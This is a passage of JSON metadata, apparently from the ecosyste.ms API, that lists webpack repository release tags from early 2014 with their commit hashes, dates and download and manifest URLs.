pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G